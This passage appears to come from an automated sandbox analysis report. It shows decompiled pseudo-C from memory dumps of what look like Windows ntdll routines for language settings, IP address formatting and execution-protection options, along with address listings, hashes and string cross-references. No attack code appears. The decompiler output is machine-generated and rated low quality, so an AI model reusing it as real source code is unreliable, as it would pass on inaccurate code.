							E02142340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0215E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0214E2A8(_t322,  &_v68, _v16);
								if(E02165553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0215E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0214E2A8(_t322,  &_v68, _t236);
								if(E02165553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0214E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0214E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0216718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0214E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E02142340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0215E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0214E2A8(_v12,  &_v68, _v16);
							if(E02165553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0215E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0214E2A8(_t322,  &_v68, _t269);
							if(E02165553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0214E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0214E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0216718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0214E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E02142340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0215E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0214E2A8(_v12,  &_v68, _v16);
						if(E02165553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0215E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0214E2A8(_t322,  &_v68, _t296);
						if(E02165553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0214E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0214E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                                                                                                                              0x02168788
                                                                                                                                                              0x02168788
                                                                                                                                                              0x02168791
                                                                                                                                                              0x02168794
                                                                                                                                                              0x02168798
                                                                                                                                                              0x0216879b
                                                                                                                                                              0x0216879e
                                                                                                                                                              0x021687a1
                                                                                                                                                              0x021687a4
                                                                                                                                                              0x021687a7
                                                                                                                                                              0x021687aa
                                                                                                                                                              0x021687af
                                                                                                                                                              0x021b1ad3
                                                                                                                                                              0x02168b0a
                                                                                                                                                              0x02168b0d
                                                                                                                                                              0x02168b13
                                                                                                                                                              0x02168b19
                                                                                                                                                              0x02168b1f
                                                                                                                                                              0x02168b25
                                                                                                                                                              0x02168b2b
                                                                                                                                                              0x02168b31
                                                                                                                                                              0x02168b37
                                                                                                                                                              0x02168b3d
                                                                                                                                                              0x02168b46
                                                                                                                                                              0x02168b46
                                                                                                                                                              0x021687c6
                                                                                                                                                              0x021687d0
                                                                                                                                                              0x021b1ae0
                                                                                                                                                              0x021b1ae6
                                                                                                                                                              0x021b1af8
                                                                                                                                                              0x021b1af8
                                                                                                                                                              0x021b1afd
                                                                                                                                                              0x021b1afe
                                                                                                                                                              0x021b1b01
                                                                                                                                                              0x021b1b06
                                                                                                                                                              0x021b1b06
                                                                                                                                                              0x021687d6
                                                                                                                                                              0x021687f2
                                                                                                                                                              0x021687f7
                                                                                                                                                              0x02168807
                                                                                                                                                              0x0216880a
                                                                                                                                                              0x0216880f
                                                                                                                                                              0x02168810
                                                                                                                                                              0x02168813
                                                                                                                                                              0x02168818
                                                                                                                                                              0x02168818
                                                                                                                                                              0x0216882c
                                                                                                                                                              0x02168831
                                                                                                                                                              0x02168838
                                                                                                                                                              0x02168908
                                                                                                                                                              0x02168920
                                                                                                                                                              0x021689f0
                                                                                                                                                              0x02168a08
                                                                                                                                                              0x02168af6
                                                                                                                                                              0x02168af6
                                                                                                                                                              0x02168af8
                                                                                                                                                              0x02168afb
                                                                                                                                                              0x021b1beb
                                                                                                                                                              0x021b1beb
                                                                                                                                                              0x02168b04
                                                                                                                                                              0x021b1bf8
                                                                                                                                                              0x021b1c0e
                                                                                                                                                              0x021b1c13
                                                                                                                                                              0x021b1c16
                                                                                                                                                              0x021b1c16
                                                                                                                                                              0x021b1bf8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02168b04
                                                                                                                                                              0x02168a0e
                                                                                                                                                              0x02168a11
                                                                                                                                                              0x02168a14
                                                                                                                                                              0x02168a15
                                                                                                                                                              0x02168a18
                                                                                                                                                              0x02168a22
                                                                                                                                                              0x02168b59
                                                                                                                                                              0x02168a28
                                                                                                                                                              0x02168a3c
                                                                                                                                                              0x02168a3c
                                                                                                                                                              0x02168a42
                                                                                                                                                              0x021b1bb0
                                                                                                                                                              0x021b1b11
                                                                                                                                                              0x021b1b11
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02168a48
                                                                                                                                                              0x02168a51
                                                                                                                                                              0x02168a5b
                                                                                                                                                              0x02168a5e
                                                                                                                                                              0x02168a61
                                                                                                                                                              0x02168a69
                                                                                                                                                              0x02168a69
                                                                                                                                                              0x02168a6d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02168a74
                                                                                                                                                              0x02168a7c
                                                                                                                                                              0x02168a7d
                                                                                                                                                              0x02168a91
                                                                                                                                                              0x02168a93
                                                                                                                                                              0x02168a93
                                                                                                                                                              0x02168a98
                                                                                                                                                              0x02168a9b
                                                                                                                                                              0x02168aa1
                                                                                                                                                              0x02168aa1
                                                                                                                                                              0x02168aa4
                                                                                                                                                              0x02168aaa
                                                                                                                                                              0x02168ab1
                                                                                                                                                              0x02168ac5
                                                                                                                                                              0x02168ac7
                                                                                                                                                              0x02168ac7
                                                                                                                                                              0x02168ac5
                                                                                                                                                              0x02168ace
                                                                                                                                                              0x021b1bc9
                                                                                                                                                              0x021b1bce
                                                                                                                                                              0x021b1bd2
                                                                                                                                                              0x021b1bd2
                                                                                                                                                              0x02168ad8
                                                                                                                                                              0x02168aeb
                                                                                                                                                              0x02168aeb
                                                                                                                                                              0x02168af0
                                                                                                                                                              0x02168af4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02168af4
                                                                                                                                                              0x02168a42
                                                                                                                                                              0x02168926
                                                                                                                                                              0x02168929
                                                                                                                                                              0x0216892c
                                                                                                                                                              0x0216892d
                                                                                                                                                              0x02168930
                                                                                                                                                              0x02168935
                                                                                                                                                              0x0216893a
                                                                                                                                                              0x02168b51
                                                                                                                                                              0x02168940
                                                                                                                                                              0x02168954
                                                                                                                                                              0x02168954
                                                                                                                                                              0x0216895a
                                                                                                                                                              0x021b1b63
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02168960
                                                                                                                                                              0x02168969
                                                                                                                                                              0x02168973
                                                                                                                                                              0x02168976
                                                                                                                                                              0x02168979
                                                                                                                                                              0x0216897e
                                                                                                                                                              0x02168981
                                                                                                                                                              0x02168981
                                                                                                                                                              0x02168986
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021b1b6e
                                                                                                                                                              0x021b1b74
                                                                                                                                                              0x021b1b7b
                                                                                                                                                              0x021b1b8f
                                                                                                                                                              0x021b1b91
                                                                                                                                                              0x021b1b91
                                                                                                                                                              0x021b1b99
                                                                                                                                                              0x021b1b9c
                                                                                                                                                              0x021b1ba2
                                                                                                                                                              0x021b1ba2
                                                                                                                                                              0x0216898c
                                                                                                                                                              0x02168992
                                                                                                                                                              0x02168999
                                                                                                                                                              0x021689ad
                                                                                                                                                              0x021b1ba8
                                                                                                                                                              0x021b1ba8
                                                                                                                                                              0x021689ad
                                                                                                                                                              0x021689b6
                                                                                                                                                              0x021689c8
                                                                                                                                                              0x021689cd
                                                                                                                                                              0x021689d0
                                                                                                                                                              0x021689d0
                                                                                                                                                              0x021689d6
                                                                                                                                                              0x021689e8
                                                                                                                                                              0x021689e8
                                                                                                                                                              0x021689ed
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021689ed
                                                                                                                                                              0x0216895a
                                                                                                                                                              0x0216883e
                                                                                                                                                              0x02168841
                                                                                                                                                              0x02168844
                                                                                                                                                              0x02168845
                                                                                                                                                              0x02168848
                                                                                                                                                              0x0216884d
                                                                                                                                                              0x02168852
                                                                                                                                                              0x02168b49
                                                                                                                                                              0x02168858
                                                                                                                                                              0x0216886c
                                                                                                                                                              0x0216886c
                                                                                                                                                              0x02168872
                                                                                                                                                              0x021b1b0e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02168878
                                                                                                                                                              0x02168881
                                                                                                                                                              0x0216888b
                                                                                                                                                              0x0216888e
                                                                                                                                                              0x02168891
                                                                                                                                                              0x02168896
                                                                                                                                                              0x02168899
                                                                                                                                                              0x02168899
                                                                                                                                                              0x0216889e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021b1b21
                                                                                                                                                              0x021b1b27
                                                                                                                                                              0x021b1b2e
                                                                                                                                                              0x021b1b42
                                                                                                                                                              0x021b1b44
                                                                                                                                                              0x021b1b44
                                                                                                                                                              0x021b1b4c
                                                                                                                                                              0x021b1b4f
                                                                                                                                                              0x021b1b55
                                                                                                                                                              0x021b1b55
                                                                                                                                                              0x021688a4
                                                                                                                                                              0x021688aa
                                                                                                                                                              0x021688b1
                                                                                                                                                              0x021688c5
                                                                                                                                                              0x021b1b5b
                                                                                                                                                              0x021b1b5b
                                                                                                                                                              0x021688c5
                                                                                                                                                              0x021688ce
                                                                                                                                                              0x021688e0
                                                                                                                                                              0x021688e5
                                                                                                                                                              0x021688e8
                                                                                                                                                              0x021688e8
                                                                                                                                                              0x021688ee
                                                                                                                                                              0x02168900
                                                                                                                                                              0x02168900
                                                                                                                                                              0x02168905
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02168905

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • Kernel-MUI-Number-Allowed, xrefs: 021687E6
                                                                                                                                                              • Kernel-MUI-Language-SKU, xrefs: 021689FC
                                                                                                                                                              • Kernel-MUI-Language-Disallowed, xrefs: 02168914
                                                                                                                                                              • Kernel-MUI-Language-Allowed, xrefs: 02168827
                                                                                                                                                              • WindowsExcludedProcs, xrefs: 021687C1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2390231666.0000000002130000.00000040.00000001.sdmp, Offset: 02120000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2390223337.0000000002120000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390330702.0000000002210000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390335585.0000000002220000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390341218.0000000002224000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390345903.0000000002227000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390352303.0000000002230000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390389715.0000000002290000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcspbrk
                                                                                                                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                              • API String ID: 402402107-258546922
                                                                                                                                                              • Opcode ID: bb67515adccd862eac7a3fa8cc1027aa23c3fc12f80e5dbbae53dacdc9c604f3
                                                                                                                                                              • Instruction ID: 24a09d2064be9f1e631ab7b0bd64136994280603510a7918d4213675b18fa817
                                                                                                                                                              • Opcode Fuzzy Hash: bb67515adccd862eac7a3fa8cc1027aa23c3fc12f80e5dbbae53dacdc9c604f3
                                                                                                                                                              • Instruction Fuzzy Hash: EAF1F8B2D80209EFCF11DF94C984AEEB7B9FF08304F16446AE915A7210E735AA55DF60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 021813CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 38%
                                                                                                                                                              			E021813CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E02177707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x2142926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E02177707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x2149cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E02177707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E02177707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E02177707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E02177707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                                                                                                                              0x021813d5
                                                                                                                                                              0x021813d9
                                                                                                                                                              0x021813dc
                                                                                                                                                              0x021813de
                                                                                                                                                              0x021813e1
                                                                                                                                                              0x021813e8
                                                                                                                                                              0x021813ee
                                                                                                                                                              0x021ae8fd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021ae921
                                                                                                                                                              0x021ae921
                                                                                                                                                              0x021ae928
                                                                                                                                                              0x021ae982
                                                                                                                                                              0x021ae98a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021ae99a
                                                                                                                                                              0x021ae99e
                                                                                                                                                              0x021ae9a3
                                                                                                                                                              0x021ae9a8
                                                                                                                                                              0x021ae9b9
                                                                                                                                                              0x021ae978
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021ae978
                                                                                                                                                              0x021ae98a
                                                                                                                                                              0x021ae92a
                                                                                                                                                              0x021ae931
                                                                                                                                                              0x021ae944
                                                                                                                                                              0x021ae944
                                                                                                                                                              0x021ae950
                                                                                                                                                              0x021ae954
                                                                                                                                                              0x021ae959
                                                                                                                                                              0x021ae95e
                                                                                                                                                              0x021ae963
                                                                                                                                                              0x021ae970
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021ae975
                                                                                                                                                              0x021ae93b
                                                                                                                                                              0x021ae980
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021ae980
                                                                                                                                                              0x021ae942
                                                                                                                                                              0x021ae94b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021ae94b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021ae942
                                                                                                                                                              0x021813f4
                                                                                                                                                              0x021813f4
                                                                                                                                                              0x021813f9
                                                                                                                                                              0x021813fc
                                                                                                                                                              0x021813ff
                                                                                                                                                              0x02181406
                                                                                                                                                              0x021ae9cc
                                                                                                                                                              0x021ae9d2
                                                                                                                                                              0x021ae9d2
                                                                                                                                                              0x021ae9cc
                                                                                                                                                              0x0218140c
                                                                                                                                                              0x02181411
                                                                                                                                                              0x02181431
                                                                                                                                                              0x0218143a
                                                                                                                                                              0x0218143c
                                                                                                                                                              0x0218143f
                                                                                                                                                              0x0218143f
                                                                                                                                                              0x02181442
                                                                                                                                                              0x02181447
                                                                                                                                                              0x021814a8
                                                                                                                                                              0x021814ac
                                                                                                                                                              0x021ae9e2
                                                                                                                                                              0x021ae9e7
                                                                                                                                                              0x021ae9ec
                                                                                                                                                              0x021aea05
                                                                                                                                                              0x021aea05
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02181449
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02181449
                                                                                                                                                              0x0218144c
                                                                                                                                                              0x02181459
                                                                                                                                                              0x02181462
                                                                                                                                                              0x02181469
                                                                                                                                                              0x0218146a
                                                                                                                                                              0x02181470
                                                                                                                                                              0x02181473
                                                                                                                                                              0x02181476
                                                                                                                                                              0x02181476
                                                                                                                                                              0x02181490
                                                                                                                                                              0x02181495
                                                                                                                                                              0x0218138e
                                                                                                                                                              0x02181390
                                                                                                                                                              0x02181397
                                                                                                                                                              0x02181398
                                                                                                                                                              0x02181399
                                                                                                                                                              0x021813a1
                                                                                                                                                              0x021813a4
                                                                                                                                                              0x021813a4
                                                                                                                                                              0x02181498
                                                                                                                                                              0x0218149c
                                                                                                                                                              0x0218149f
                                                                                                                                                              0x021814a2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021814a4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x021814a4
                                                                                                                                                              0x02181413
                                                                                                                                                              0x02181415
                                                                                                                                                              0x02181416
                                                                                                                                                              0x02181419
                                                                                                                                                              0x0218141c
                                                                                                                                                              0x02181422
                                                                                                                                                              0x021813b7
                                                                                                                                                              0x021813bc
                                                                                                                                                              0x021813bf
                                                                                                                                                              0x021813bf
                                                                                                                                                              0x021813c2
                                                                                                                                                              0x02181424
                                                                                                                                                              0x02181424
                                                                                                                                                              0x02181424
                                                                                                                                                              0x02181427
                                                                                                                                                              0x0218142b
                                                                                                                                                              0x0218142c
                                                                                                                                                              0x0218142c
                                                                                                                                                              0x0218142c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0218141c
                                                                                                                                                              0x02181411

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2390231666.0000000002130000.00000040.00000001.sdmp, Offset: 02120000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2390223337.0000000002120000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390330702.0000000002210000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390335585.0000000002220000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390341218.0000000002224000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390345903.0000000002227000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390352303.0000000002230000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390389715.0000000002290000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                                                              • Opcode ID: 71c975124938351cefd332ced75535d46c564b2e4db173e55da8f09c676f72ae
                                                                                                                                                              • Instruction ID: c19e6a0aed95bc476b31f9c09cea92deb4a4e7752c9ace9bc14b02f19f3da8ba
                                                                                                                                                              • Opcode Fuzzy Hash: 71c975124938351cefd332ced75535d46c564b2e4db173e55da8f09c676f72ae
                                                                                                                                                              • Instruction Fuzzy Hash: F761F2B6940655BADF28EF99C8D09BFBBB6EF84300B14C52DE8EE46540D734A641CF60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 02177EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 64%
                                                                                                                                                              			E02177EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x2222088; // 0x77464aef
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E02177F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E02193F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0214DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x2224218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E02193F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E02150D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E02193F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E02158375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E02193F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E021BE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E02193F92();
					_t38 = 1;
					L2:
					return E0214E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                                                                                                                              0x02177f08
                                                                                                                                                              0x02177f0f
                                                                                                                                                              0x02177f12
                                                                                                                                                              0x02177f1b
                                                                                                                                                              0x02177f31
                                                                                                                                                              0x02193ead
                                                                                                                                                              0x02193eb4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02193eba
                                                                                                                                                              0x02193ecd
                                                                                                                                                              0x02193ed2
                                                                                                                                                              0x02193ee1
                                                                                                                                                              0x02193ee7
                                                                                                                                                              0x02193eec
                                                                                                                                                              0x02193f12
                                                                                                                                                              0x02193f18
                                                                                                                                                              0x02193f1a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02193f20
                                                                                                                                                              0x02193f26
                                                                                                                                                              0x02193f28
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02193f2e
                                                                                                                                                              0x02193f30
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x02193f3a
                                                                                                                                                              0x02193f3b
                                                                                                                                                              0x02193f53
                                                                                                                                                              0x02193f64
                                                                                                                                                              0x02193f69
                                                                                                                                                              0x02193f6c
                                                                                                                                                              0x02193f6d
                                                                                                                                                              0x02193f6f
                                                                                                                                                              0x0219e304
                                                                                                                                                              0x0219e30f
                                                                                                                                                              0x0219e315
                                                                                                                                                              0x0219e31e
                                                                                                                                                              0x0219e321
                                                                                                                                                              0x0219e327
                                                                                                                                                              0x0219e329
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0219e32f
                                                                                                                                                              0x0219e32f
                                                                                                                                                              0x0219e337
                                                                                                                                                              0x0219e33a
